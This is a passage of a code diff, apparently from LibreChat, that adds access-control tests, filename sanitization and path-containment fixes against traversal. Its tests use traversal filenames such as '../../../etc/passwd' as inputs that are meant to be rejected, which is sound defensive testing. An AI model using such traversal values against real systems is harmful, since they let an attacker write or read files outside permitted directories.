loadToolsForExecution: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/controllers/ModelController', () => ({
|
||||||
|
getModelsConfig: jest.fn().mockResolvedValue({}),
|
||||||
|
}));
|
||||||
|
|
||||||
|
let agentClientArgs;
|
||||||
|
jest.mock('~/server/controllers/agents/client', () => {
|
||||||
|
return jest.fn().mockImplementation((args) => {
|
||||||
|
agentClientArgs = args;
|
||||||
|
return {};
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
jest.mock('./addedConvo', () => ({
|
||||||
|
processAddedConvo: jest.fn().mockResolvedValue({ userMCPAuthMap: undefined }),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/cache', () => ({
|
||||||
|
logViolation: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
const { initializeClient } = require('./initialize');
|
||||||
|
const { createAgent } = require('~/models/Agent');
|
||||||
|
const { User, AclEntry } = require('~/db/models');
|
||||||
|
|
||||||
|
const PRIMARY_ID = 'agent_primary';
|
||||||
|
const TARGET_ID = 'agent_target';
|
||||||
|
const AUTHORIZED_ID = 'agent_authorized';
|
||||||
|
|
||||||
|
describe('initializeClient — processAgent ACL gate', () => {
|
||||||
|
let mongoServer;
|
||||||
|
let testUser;
|
||||||
|
|
||||||
|
beforeAll(async () => {
|
||||||
|
mongoServer = await MongoMemoryServer.create();
|
||||||
|
await mongoose.connect(mongoServer.getUri());
|
||||||
|
});
|
||||||
|
|
||||||
|
afterAll(async () => {
|
||||||
|
await mongoose.disconnect();
|
||||||
|
await mongoServer.stop();
|
||||||
|
});
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
await mongoose.connection.dropDatabase();
|
||||||
|
jest.clearAllMocks();
|
||||||
|
agentClientArgs = undefined;
|
||||||
|
|
||||||
|
testUser = await User.create({
|
||||||
|
email: 'test@example.com',
|
||||||
|
name: 'Test User',
|
||||||
|
username: 'testuser',
|
||||||
|
role: 'USER',
|
||||||
|
});
|
||||||
|
|
||||||
|
mockValidateAgentModel.mockResolvedValue({ isValid: true });
|
||||||
|
});
|
||||||
|
|
||||||
|
const makeReq = () => ({
|
||||||
|
user: { id: testUser._id.toString(), role: 'USER' },
|
||||||
|
body: { conversationId: 'conv_1', files: [] },
|
||||||
|
config: { endpoints: {} },
|
||||||
|
_resumableStreamId: null,
|
||||||
|
});
|
||||||
|
|
||||||
|
const makeEndpointOption = () => ({
|
||||||
|
agent: Promise.resolve({
|
||||||
|
id: PRIMARY_ID,
|
||||||
|
name: 'Primary',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
tools: [],
|
||||||
|
}),
|
||||||
|
model_parameters: { model: 'gpt-4' },
|
||||||
|
endpoint: 'agents',
|
||||||
|
});
|
||||||
|
|
||||||
|
const makePrimaryConfig = (edges) => ({
|
||||||
|
id: PRIMARY_ID,
|
||||||
|
endpoint: 'agents',
|
||||||
|
edges,
|
||||||
|
toolDefinitions: [],
|
||||||
|
toolRegistry: new Map(),
|
||||||
|
userMCPAuthMap: null,
|
||||||
|
tool_resources: {},
|
||||||
|
resendFiles: true,
|
||||||
|
maxContextTokens: 4096,
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should skip handoff agent and filter its edge when user lacks VIEW access', async () => {
|
||||||
|
await createAgent({
|
||||||
|
id: TARGET_ID,
|
||||||
|
name: 'Target Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: new mongoose.Types.ObjectId(),
|
||||||
|
tools: [],
|
||||||
|
});
|
||||||
|
|
||||||
|
const edges = [{ from: PRIMARY_ID, to: TARGET_ID, edgeType: 'handoff' }];
|
||||||
|
mockInitializeAgent.mockResolvedValue(makePrimaryConfig(edges));
|
||||||
|
|
||||||
|
await initializeClient({
|
||||||
|
req: makeReq(),
|
||||||
|
res: {},
|
||||||
|
signal: new AbortController().signal,
|
||||||
|
endpointOption: makeEndpointOption(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(mockInitializeAgent).toHaveBeenCalledTimes(1);
|
||||||
|
expect(agentClientArgs.agent.edges).toEqual([]);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should initialize handoff agent and keep its edge when user has VIEW access', async () => {
|
||||||
|
const authorizedAgent = await createAgent({
|
||||||
|
id: AUTHORIZED_ID,
|
||||||
|
name: 'Authorized Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: new mongoose.Types.ObjectId(),
|
||||||
|
tools: [],
|
||||||
|
});
|
||||||
|
|
||||||
|
await AclEntry.create({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: testUser._id,
|
||||||
|
principalModel: PrincipalModel.USER,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: authorizedAgent._id,
|
||||||
|
permBits: PermissionBits.VIEW,
|
||||||
|
grantedBy: testUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
const edges = [{ from: PRIMARY_ID, to: AUTHORIZED_ID, edgeType: 'handoff' }];
|
||||||
|
const handoffConfig = {
|
||||||
|
id: AUTHORIZED_ID,
|
||||||
|
edges: [],
|
||||||
|
toolDefinitions: [],
|
||||||
|
toolRegistry: new Map(),
|
||||||
|
userMCPAuthMap: null,
|
||||||
|
tool_resources: {},
|
||||||
|
};
|
||||||
|
|
||||||
|
let callCount = 0;
|
||||||
|
mockInitializeAgent.mockImplementation(() => {
|
||||||
|
callCount++;
|
||||||
|
return callCount === 1
|
||||||
|
? Promise.resolve(makePrimaryConfig(edges))
|
||||||
|
: Promise.resolve(handoffConfig);
|
||||||
|
});
|
||||||
|
|
||||||
|
await initializeClient({
|
||||||
|
req: makeReq(),
|
||||||
|
res: {},
|
||||||
|
signal: new AbortController().signal,
|
||||||
|
endpointOption: makeEndpointOption(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(mockInitializeAgent).toHaveBeenCalledTimes(2);
|
||||||
|
expect(agentClientArgs.agent.edges).toHaveLength(1);
|
||||||
|
expect(agentClientArgs.agent.edges[0].to).toBe(AUTHORIZED_ID);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -0,0 +1,124 @@
|
||||||
|
jest.mock('uuid', () => ({ v4: jest.fn(() => 'mock-uuid') }));
|
||||||
|
|
||||||
|
jest.mock('@librechat/data-schemas', () => ({
|
||||||
|
logger: { warn: jest.fn(), debug: jest.fn(), error: jest.fn() },
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('@librechat/agents', () => ({
|
||||||
|
getCodeBaseURL: jest.fn(() => 'http://localhost:8000'),
|
||||||
|
}));
|
||||||
|
|
||||||
|
const mockSanitizeFilename = jest.fn();
|
||||||
|
|
||||||
|
jest.mock('@librechat/api', () => ({
|
||||||
|
logAxiosError: jest.fn(),
|
||||||
|
getBasePath: jest.fn(() => ''),
|
||||||
|
sanitizeFilename: mockSanitizeFilename,
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('librechat-data-provider', () => ({
|
||||||
|
...jest.requireActual('librechat-data-provider'),
|
||||||
|
mergeFileConfig: jest.fn(() => ({ serverFileSizeLimit: 100 * 1024 * 1024 })),
|
||||||
|
getEndpointFileConfig: jest.fn(() => ({
|
||||||
|
fileSizeLimit: 100 * 1024 * 1024,
|
||||||
|
supportedMimeTypes: ['*/*'],
|
||||||
|
})),
|
||||||
|
fileConfig: { checkType: jest.fn(() => true) },
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models', () => ({
|
||||||
|
createFile: jest.fn().mockResolvedValue({}),
|
||||||
|
getFiles: jest.fn().mockResolvedValue([]),
|
||||||
|
updateFile: jest.fn(),
|
||||||
|
claimCodeFile: jest.fn().mockResolvedValue({ file_id: 'mock-uuid', usage: 0 }),
|
||||||
|
}));
|
||||||
|
|
||||||
|
const mockSaveBuffer = jest.fn().mockResolvedValue('/uploads/user123/mock-uuid__output.csv');
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/strategies', () => ({
|
||||||
|
getStrategyFunctions: jest.fn(() => ({
|
||||||
|
saveBuffer: mockSaveBuffer,
|
||||||
|
})),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/permissions', () => ({
|
||||||
|
filterFilesByAgentAccess: jest.fn().mockResolvedValue([]),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/images/convert', () => ({
|
||||||
|
convertImage: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/utils', () => ({
|
||||||
|
determineFileType: jest.fn().mockResolvedValue({ mime: 'text/csv' }),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('axios', () =>
|
||||||
|
jest.fn().mockResolvedValue({
|
||||||
|
data: Buffer.from('file-content'),
|
||||||
|
}),
|
||||||
|
);
|
||||||
|
|
||||||
|
const { createFile } = require('~/models');
|
||||||
|
const { processCodeOutput } = require('../process');
|
||||||
|
|
||||||
|
const baseParams = {
|
||||||
|
req: {
|
||||||
|
user: { id: 'user123' },
|
||||||
|
config: {
|
||||||
|
fileStrategy: 'local',
|
||||||
|
imageOutputType: 'webp',
|
||||||
|
fileConfig: {},
|
||||||
|
},
|
||||||
|
},
|
||||||
|
id: 'code-file-id',
|
||||||
|
apiKey: 'test-key',
|
||||||
|
toolCallId: 'tool-1',
|
||||||
|
conversationId: 'conv-1',
|
||||||
|
messageId: 'msg-1',
|
||||||
|
session_id: 'session-1',
|
||||||
|
};
|
||||||
|
|
||||||
|
describe('processCodeOutput path traversal protection', () => {
|
||||||
|
beforeEach(() => {
|
||||||
|
jest.clearAllMocks();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('sanitizeFilename is called with the raw artifact name', async () => {
|
||||||
|
mockSanitizeFilename.mockReturnValueOnce('output.csv');
|
||||||
|
await processCodeOutput({ ...baseParams, name: 'output.csv' });
|
||||||
|
expect(mockSanitizeFilename).toHaveBeenCalledWith('output.csv');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('sanitized name is used in saveBuffer fileName', async () => {
|
||||||
|
mockSanitizeFilename.mockReturnValueOnce('sanitized-name.txt');
|
||||||
|
await processCodeOutput({ ...baseParams, name: '../../../tmp/poc.txt' });
|
||||||
|
|
||||||
|
expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../tmp/poc.txt');
|
||||||
|
const call = mockSaveBuffer.mock.calls[0][0];
|
||||||
|
expect(call.fileName).toBe('mock-uuid__sanitized-name.txt');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('sanitized name is stored as filename in the file record', async () => {
|
||||||
|
mockSanitizeFilename.mockReturnValueOnce('safe-output.csv');
|
||||||
|
await processCodeOutput({ ...baseParams, name: 'unsafe/../../output.csv' });
|
||||||
|
|
||||||
|
const fileArg = createFile.mock.calls[0][0];
|
||||||
|
expect(fileArg.filename).toBe('safe-output.csv');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('sanitized name is used for image file records', async () => {
|
||||||
|
const { convertImage } = require('~/server/services/Files/images/convert');
|
||||||
|
convertImage.mockResolvedValueOnce({
|
||||||
|
filepath: '/images/user123/mock-uuid.webp',
|
||||||
|
bytes: 100,
|
||||||
|
});
|
||||||
|
|
||||||
|
mockSanitizeFilename.mockReturnValueOnce('safe-chart.png');
|
||||||
|
await processCodeOutput({ ...baseParams, name: '../../../chart.png' });
|
||||||
|
|
||||||
|
expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../chart.png');
|
||||||
|
const fileArg = createFile.mock.calls[0][0];
|
||||||
|
expect(fileArg.filename).toBe('safe-chart.png');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -3,7 +3,7 @@ const { v4 } = require('uuid');
|
||||||
const axios = require('axios');
|
const axios = require('axios');
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
const { getCodeBaseURL } = require('@librechat/agents');
|
const { getCodeBaseURL } = require('@librechat/agents');
|
||||||
const { logAxiosError, getBasePath } = require('@librechat/api');
|
const { logAxiosError, getBasePath, sanitizeFilename } = require('@librechat/api');
|
||||||
const {
|
const {
|
||||||
Tools,
|
Tools,
|
||||||
megabyte,
|
megabyte,
|
||||||
|
|
@ -146,6 +146,13 @@ const processCodeOutput = async ({
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
const safeName = sanitizeFilename(name);
|
||||||
|
if (safeName !== name) {
|
||||||
|
logger.warn(
|
||||||
|
`[processCodeOutput] Filename sanitized: "${name}" -> "${safeName}" | conv=${conversationId}`,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
if (isImage) {
|
if (isImage) {
|
||||||
const usage = isUpdate ? (claimed.usage ?? 0) + 1 : 1;
|
const usage = isUpdate ? (claimed.usage ?? 0) + 1 : 1;
|
||||||
const _file = await convertImage(req, buffer, 'high', `${file_id}${fileExt}`);
|
const _file = await convertImage(req, buffer, 'high', `${file_id}${fileExt}`);
|
||||||
|
|
@ -156,7 +163,7 @@ const processCodeOutput = async ({
|
||||||
file_id,
|
file_id,
|
||||||
messageId,
|
messageId,
|
||||||
usage,
|
usage,
|
||||||
filename: name,
|
filename: safeName,
|
||||||
conversationId,
|
conversationId,
|
||||||
user: req.user.id,
|
user: req.user.id,
|
||||||
type: `image/${appConfig.imageOutputType}`,
|
type: `image/${appConfig.imageOutputType}`,
|
||||||
|
|
@ -200,7 +207,7 @@ const processCodeOutput = async ({
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
const fileName = `${file_id}__${name}`;
|
const fileName = `${file_id}__${safeName}`;
|
||||||
const filepath = await saveBuffer({
|
const filepath = await saveBuffer({
|
||||||
userId: req.user.id,
|
userId: req.user.id,
|
||||||
buffer,
|
buffer,
|
||||||
|
|
@ -213,7 +220,7 @@ const processCodeOutput = async ({
|
||||||
filepath,
|
filepath,
|
||||||
messageId,
|
messageId,
|
||||||
object: 'file',
|
object: 'file',
|
||||||
filename: name,
|
filename: safeName,
|
||||||
type: mimeType,
|
type: mimeType,
|
||||||
conversationId,
|
conversationId,
|
||||||
user: req.user.id,
|
user: req.user.id,
|
||||||
|
|
@ -229,6 +236,11 @@ const processCodeOutput = async ({
|
||||||
await createFile(file, true);
|
await createFile(file, true);
|
||||||
return Object.assign(file, { messageId, toolCallId });
|
return Object.assign(file, { messageId, toolCallId });
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
|
if (error?.message === 'Path traversal detected in filename') {
|
||||||
|
logger.warn(
|
||||||
|
`[processCodeOutput] Path traversal blocked for file "${name}" | conv=${conversationId}`,
|
||||||
|
);
|
||||||
|
}
|
||||||
logAxiosError({
|
logAxiosError({
|
||||||
message: 'Error downloading/processing code environment file',
|
message: 'Error downloading/processing code environment file',
|
||||||
error,
|
error,
|
||||||
|
|
|
||||||
|
|
@ -58,6 +58,7 @@ jest.mock('@librechat/agents', () => ({
|
||||||
jest.mock('@librechat/api', () => ({
|
jest.mock('@librechat/api', () => ({
|
||||||
logAxiosError: jest.fn(),
|
logAxiosError: jest.fn(),
|
||||||
getBasePath: jest.fn(() => ''),
|
getBasePath: jest.fn(() => ''),
|
||||||
|
sanitizeFilename: jest.fn((name) => name),
|
||||||
}));
|
}));
|
||||||
|
|
||||||
// Mock models
|
// Mock models
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,69 @@
|
||||||
|
jest.mock('@librechat/api', () => ({ deleteRagFile: jest.fn() }));
|
||||||
|
jest.mock('@librechat/data-schemas', () => ({
|
||||||
|
logger: { warn: jest.fn(), error: jest.fn() },
|
||||||
|
}));
|
||||||
|
|
||||||
|
const mockTmpBase = require('fs').mkdtempSync(
|
||||||
|
require('path').join(require('os').tmpdir(), 'crud-traversal-'),
|
||||||
|
);
|
||||||
|
|
||||||
|
jest.mock('~/config/paths', () => {
|
||||||
|
const path = require('path');
|
||||||
|
return {
|
||||||
|
publicPath: path.join(mockTmpBase, 'public'),
|
||||||
|
uploads: path.join(mockTmpBase, 'uploads'),
|
||||||
|
};
|
||||||
|
});
|
||||||
|
|
||||||
|
const fs = require('fs');
|
||||||
|
const path = require('path');
|
||||||
|
const { saveLocalBuffer } = require('../crud');
|
||||||
|
|
||||||
|
describe('saveLocalBuffer path containment', () => {
|
||||||
|
beforeAll(() => {
|
||||||
|
fs.mkdirSync(path.join(mockTmpBase, 'public', 'images'), { recursive: true });
|
||||||
|
fs.mkdirSync(path.join(mockTmpBase, 'uploads'), { recursive: true });
|
||||||
|
});
|
||||||
|
|
||||||
|
afterAll(() => {
|
||||||
|
fs.rmSync(mockTmpBase, { recursive: true, force: true });
|
||||||
|
});
|
||||||
|
|
||||||
|
test('rejects filenames with path traversal sequences', async () => {
|
||||||
|
await expect(
|
||||||
|
saveLocalBuffer({
|
||||||
|
userId: 'user1',
|
||||||
|
buffer: Buffer.from('malicious'),
|
||||||
|
fileName: '../../../etc/passwd',
|
||||||
|
basePath: 'uploads',
|
||||||
|
}),
|
||||||
|
).rejects.toThrow('Path traversal detected in filename');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('rejects prefix-collision traversal (startsWith bypass)', async () => {
|
||||||
|
fs.mkdirSync(path.join(mockTmpBase, 'uploads', 'user10'), { recursive: true });
|
||||||
|
await expect(
|
||||||
|
saveLocalBuffer({
|
||||||
|
userId: 'user1',
|
||||||
|
buffer: Buffer.from('malicious'),
|
||||||
|
fileName: '../user10/evil',
|
||||||
|
basePath: 'uploads',
|
||||||
|
}),
|
||||||
|
).rejects.toThrow('Path traversal detected in filename');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('allows normal filenames', async () => {
|
||||||
|
const result = await saveLocalBuffer({
|
||||||
|
userId: 'user1',
|
||||||
|
buffer: Buffer.from('safe content'),
|
||||||
|
fileName: 'file-id__output.csv',
|
||||||
|
basePath: 'uploads',
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toBe('/uploads/user1/file-id__output.csv');
|
||||||
|
|
||||||
|
const filePath = path.join(mockTmpBase, 'uploads', 'user1', 'file-id__output.csv');
|
||||||
|
expect(fs.existsSync(filePath)).toBe(true);
|
||||||
|
fs.unlinkSync(filePath);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -78,7 +78,13 @@ async function saveLocalBuffer({ userId, buffer, fileName, basePath = 'images' }
|
||||||
fs.mkdirSync(directoryPath, { recursive: true });
|
fs.mkdirSync(directoryPath, { recursive: true });
|
||||||
}
|
}
|
||||||
|
|
||||||
fs.writeFileSync(path.join(directoryPath, fileName), buffer);
|
const resolvedDir = path.resolve(directoryPath);
|
||||||
|
const resolvedPath = path.resolve(resolvedDir, fileName);
|
||||||
|
const rel = path.relative(resolvedDir, resolvedPath);
|
||||||
|
if (rel.startsWith('..') || path.isAbsolute(rel) || rel.includes(`..${path.sep}`)) {
|
||||||
|
throw new Error('Path traversal detected in filename');
|
||||||
|
}
|
||||||
|
fs.writeFileSync(resolvedPath, buffer);
|
||||||
|
|
||||||
const filePath = path.posix.join('/', basePath, userId, fileName);
|
const filePath = path.posix.join('/', basePath, userId, fileName);
|
||||||
|
|
||||||
|
|
@ -165,9 +171,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) {
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Validates if a given filepath is within a specified subdirectory under a base path. This function constructs
|
* Validates that a filepath is strictly contained within a subdirectory under a base path,
|
||||||
* the expected base path using the base, subfolder, and user id from the request, and then checks if the
|
* using path.relative to prevent prefix-collision bypasses.
|
||||||
* provided filepath starts with this constructed base path.
|
|
||||||
*
|
*
|
||||||
* @param {ServerRequest} req - The request object from Express. It should contain a `user` property with an `id`.
|
* @param {ServerRequest} req - The request object from Express. It should contain a `user` property with an `id`.
|
||||||
* @param {string} base - The base directory path.
|
* @param {string} base - The base directory path.
|
||||||
|
|
@ -180,7 +185,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) {
|
||||||
const isValidPath = (req, base, subfolder, filepath) => {
|
const isValidPath = (req, base, subfolder, filepath) => {
|
||||||
const normalizedBase = path.resolve(base, subfolder, req.user.id);
|
const normalizedBase = path.resolve(base, subfolder, req.user.id);
|
||||||
const normalizedFilepath = path.resolve(filepath);
|
const normalizedFilepath = path.resolve(filepath);
|
||||||
return normalizedFilepath.startsWith(normalizedBase);
|
const rel = path.relative(normalizedBase, normalizedFilepath);
|
||||||
|
return !rel.startsWith('..') && !path.isAbsolute(rel) && !rel.includes(`..${path.sep}`);
|
||||||
};
|
};
|
||||||
|
|
||||||
/**
|
/**
|
||||||
|
|
|
||||||
|
|
@ -3,7 +3,7 @@ const fetch = require('node-fetch');
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
const { FileSources } = require('librechat-data-provider');
|
const { FileSources } = require('librechat-data-provider');
|
||||||
const { getSignedUrl } = require('@aws-sdk/s3-request-presigner');
|
const { getSignedUrl } = require('@aws-sdk/s3-request-presigner');
|
||||||
const { initializeS3, deleteRagFile } = require('@librechat/api');
|
const { initializeS3, deleteRagFile, isEnabled } = require('@librechat/api');
|
||||||
const {
|
const {
|
||||||
PutObjectCommand,
|
PutObjectCommand,
|
||||||
GetObjectCommand,
|
GetObjectCommand,
|
||||||
|
|
@ -13,6 +13,8 @@ const {
|
||||||
|
|
||||||
const bucketName = process.env.AWS_BUCKET_NAME;
|
const bucketName = process.env.AWS_BUCKET_NAME;
|
||||||
const defaultBasePath = 'images';
|
const defaultBasePath = 'images';
|
||||||
|
const endpoint = process.env.AWS_ENDPOINT_URL;
|
||||||
|
const forcePathStyle = isEnabled(process.env.AWS_FORCE_PATH_STYLE);
|
||||||
|
|
||||||
let s3UrlExpirySeconds = 2 * 60; // 2 minutes
|
let s3UrlExpirySeconds = 2 * 60; // 2 minutes
|
||||||
let s3RefreshExpiryMs = null;
|
let s3RefreshExpiryMs = null;
|
||||||
|
|
@ -252,15 +254,83 @@ function extractKeyFromS3Url(fileUrlOrKey) {
|
||||||
|
|
||||||
try {
|
try {
|
||||||
const url = new URL(fileUrlOrKey);
|
const url = new URL(fileUrlOrKey);
|
||||||
return url.pathname.substring(1);
|
const hostname = url.hostname;
|
||||||
|
const pathname = url.pathname.substring(1); // Remove leading slash
|
||||||
|
|
||||||
|
// Explicit path-style with custom endpoint: use endpoint pathname for precise key extraction.
|
||||||
|
// Handles endpoints with a base path (e.g. https://example.com/storage/).
|
||||||
|
if (endpoint && forcePathStyle) {
|
||||||
|
const endpointUrl = new URL(endpoint);
|
||||||
|
const startPos =
|
||||||
|
endpointUrl.pathname.length +
|
||||||
|
(endpointUrl.pathname.endsWith('/') ? 0 : 1) +
|
||||||
|
bucketName.length +
|
||||||
|
1;
|
||||||
|
const key = url.pathname.substring(startPos);
|
||||||
|
if (!key) {
|
||||||
|
logger.warn(
|
||||||
|
`[extractKeyFromS3Url] Extracted key is empty for endpoint path-style URL: ${fileUrlOrKey}`,
|
||||||
|
);
|
||||||
|
} else {
|
||||||
|
logger.debug(`[extractKeyFromS3Url] fileUrlOrKey: ${fileUrlOrKey}, Extracted key: ${key}`);
|
||||||
|
}
|
||||||
|
return key;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (
|
||||||
|
hostname === 's3.amazonaws.com' ||
|
||||||
|
hostname.match(/^s3[-.][a-z0-9-]+\.amazonaws\.com$/) ||
|
||||||
|
(bucketName && pathname.startsWith(`${bucketName}/`))
|
||||||
|
) {
|
||||||
|
// Path-style: https://s3.amazonaws.com/bucket-name/key or custom endpoint (MinIO, R2, etc.)
|
||||||
|
// Strip the bucket name (first path segment)
|
||||||
|
const firstSlashIndex = pathname.indexOf('/');
|
||||||
|
if (firstSlashIndex > 0) {
|
||||||
|
const key = pathname.substring(firstSlashIndex + 1);
|
||||||
|
|
||||||
|
if (key === '') {
|
||||||
|
logger.warn(
|
||||||
|
`[extractKeyFromS3Url] Extracted key is empty after removing bucket name from URL: ${fileUrlOrKey}`,
|
||||||
|
);
|
||||||
|
} else {
|
||||||
|
logger.debug(
|
||||||
|
`[extractKeyFromS3Url] fileUrlOrKey: ${fileUrlOrKey}, Extracted key: ${key}`,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
return key;
|
||||||
|
} else {
|
||||||
|
logger.warn(
|
||||||
|
`[extractKeyFromS3Url] Unable to extract key from path-style URL: ${fileUrlOrKey}`,
|
||||||
|
);
|
||||||
|
return '';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Virtual-hosted-style or other: https://bucket-name.s3.amazonaws.com/key
|
||||||
|
// Just return the pathname without leading slash
|
||||||
|
logger.debug(`[extractKeyFromS3Url] fileUrlOrKey: ${fileUrlOrKey}, Extracted key: ${pathname}`);
|
||||||
|
return pathname;
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
|
if (fileUrlOrKey.startsWith('http://') || fileUrlOrKey.startsWith('https://')) {
|
||||||
|
logger.error(
|
||||||
|
`[extractKeyFromS3Url] Error parsing URL: ${fileUrlOrKey}, Error: ${error.message}`,
|
||||||
|
);
|
||||||
|
} else {
|
||||||
|
logger.debug(`[extractKeyFromS3Url] Non-URL input, using fallback: ${fileUrlOrKey}`);
|
||||||
|
}
|
||||||
|
|
||||||
const parts = fileUrlOrKey.split('/');
|
const parts = fileUrlOrKey.split('/');
|
||||||
|
|
||||||
if (parts.length >= 3 && !fileUrlOrKey.startsWith('http') && !fileUrlOrKey.startsWith('/')) {
|
if (parts.length >= 3 && !fileUrlOrKey.startsWith('http') && !fileUrlOrKey.startsWith('/')) {
|
||||||
return fileUrlOrKey;
|
return fileUrlOrKey;
|
||||||
}
|
}
|
||||||
|
|
||||||
return fileUrlOrKey.startsWith('/') ? fileUrlOrKey.substring(1) : fileUrlOrKey;
|
const key = fileUrlOrKey.startsWith('/') ? fileUrlOrKey.substring(1) : fileUrlOrKey;
|
||||||
|
logger.debug(
|
||||||
|
`[extractKeyFromS3Url] FALLBACK. fileUrlOrKey: ${fileUrlOrKey}, Extracted key: ${key}`,
|
||||||
|
);
|
||||||
|
return key;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -482,4 +552,5 @@ module.exports = {
|
||||||
refreshS3Url,
|
refreshS3Url,
|
||||||
needsRefresh,
|
needsRefresh,
|
||||||
getNewS3URL,
|
getNewS3URL,
|
||||||
|
extractKeyFromS3Url,
|
||||||
};
|
};
|
||||||
|
|
|
||||||
|
|
@ -1,10 +1,29 @@
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
const { PermissionBits, ResourceType } = require('librechat-data-provider');
|
const { PermissionBits, ResourceType, isEphemeralAgentId } = require('librechat-data-provider');
|
||||||
const { checkPermission } = require('~/server/services/PermissionService');
|
const { checkPermission } = require('~/server/services/PermissionService');
|
||||||
const { getAgent } = require('~/models/Agent');
|
const { getAgent } = require('~/models/Agent');
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Checks if a user has access to multiple files through a shared agent (batch operation)
|
* @param {Object} agent - The agent document (lean)
|
||||||
|
* @returns {Set<string>} All file IDs attached across all resource types
|
||||||
|
*/
|
||||||
|
function getAttachedFileIds(agent) {
|
||||||
|
const attachedFileIds = new Set();
|
||||||
|
if (agent.tool_resources) {
|
||||||
|
for (const resource of Object.values(agent.tool_resources)) {
|
||||||
|
if (resource?.file_ids && Array.isArray(resource.file_ids)) {
|
||||||
|
for (const fileId of resource.file_ids) {
|
||||||
|
attachedFileIds.add(fileId);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return attachedFileIds;
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Checks if a user has access to multiple files through a shared agent (batch operation).
|
||||||
|
* Access is always scoped to files actually attached to the agent's tool_resources.
|
||||||
* @param {Object} params - Parameters object
|
* @param {Object} params - Parameters object
|
||||||
* @param {string} params.userId - The user ID to check access for
|
* @param {string} params.userId - The user ID to check access for
|
||||||
* @param {string} [params.role] - Optional user role to avoid DB query
|
* @param {string} [params.role] - Optional user role to avoid DB query
|
||||||
|
|
@ -16,7 +35,6 @@ const { getAgent } = require('~/models/Agent');
|
||||||
const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDelete }) => {
|
const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDelete }) => {
|
||||||
const accessMap = new Map();
|
const accessMap = new Map();
|
||||||
|
|
||||||
// Initialize all files as no access
|
|
||||||
fileIds.forEach((fileId) => accessMap.set(fileId, false));
|
fileIds.forEach((fileId) => accessMap.set(fileId, false));
|
||||||
|
|
||||||
try {
|
try {
|
||||||
|
|
@ -26,13 +44,17 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
|
||||||
return accessMap;
|
return accessMap;
|
||||||
}
|
}
|
||||||
|
|
||||||
// Check if user is the author - if so, grant access to all files
|
const attachedFileIds = getAttachedFileIds(agent);
|
||||||
|
|
||||||
if (agent.author.toString() === userId.toString()) {
|
if (agent.author.toString() === userId.toString()) {
|
||||||
fileIds.forEach((fileId) => accessMap.set(fileId, true));
|
fileIds.forEach((fileId) => {
|
||||||
|
if (attachedFileIds.has(fileId)) {
|
||||||
|
accessMap.set(fileId, true);
|
||||||
|
}
|
||||||
|
});
|
||||||
return accessMap;
|
return accessMap;
|
||||||
}
|
}
|
||||||
|
|
||||||
// Check if user has at least VIEW permission on the agent
|
|
||||||
const hasViewPermission = await checkPermission({
|
const hasViewPermission = await checkPermission({
|
||||||
userId,
|
userId,
|
||||||
